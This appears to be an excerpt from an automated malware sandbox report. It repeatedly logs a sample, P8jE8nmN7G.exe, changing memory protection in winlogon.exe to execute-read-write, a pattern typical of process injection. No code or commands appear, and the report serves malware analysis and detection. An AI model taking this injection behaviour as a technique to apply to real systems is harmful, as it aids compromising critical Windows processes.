Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE39000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE3B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE59000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE5B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE79000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE7B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE99000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CE9B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEB9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEBB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CED6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CED9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEDB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEF9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CEFB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF19000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF1B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF39000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF3B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF59000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF5B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF79000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF7B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF99000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CF9B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFB9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFBB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFD9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFDB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFF9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CFFB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D000000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D001000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D016000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D019000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D01B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D020000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D021000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D036000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D039000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D03B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D040000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D041000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D056000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D059000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D05B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D060000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D061000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D076000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D079000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D07B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D080000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D081000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D096000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D099000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D09B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0B9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0BB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0D9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0DB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0F9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D0FB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D100000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D101000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D116000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D119000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D11B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D120000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D121000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D136000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D139000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D13B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D140000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D141000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D156000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D159000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D15B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D160000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D161000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D176000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D179000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D17B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D180000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D181000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D196000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D199000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D19B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1B9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1BB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1D9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1DB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1F9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D1FB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D200000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D201000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D216000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D219000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D21B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D220000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D221000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D236000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D239000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D23B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D240000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D241000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D256000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D259000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D25B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D260000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D261000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D276000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D279000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D27B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D280000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D281000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D296000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D299000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D29B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2A1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2B6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2B9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2BB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2C1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2D6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2D9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2DB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2E1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2F6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2F9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D2FB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: D300000 protect: page readonlyJump to behavior
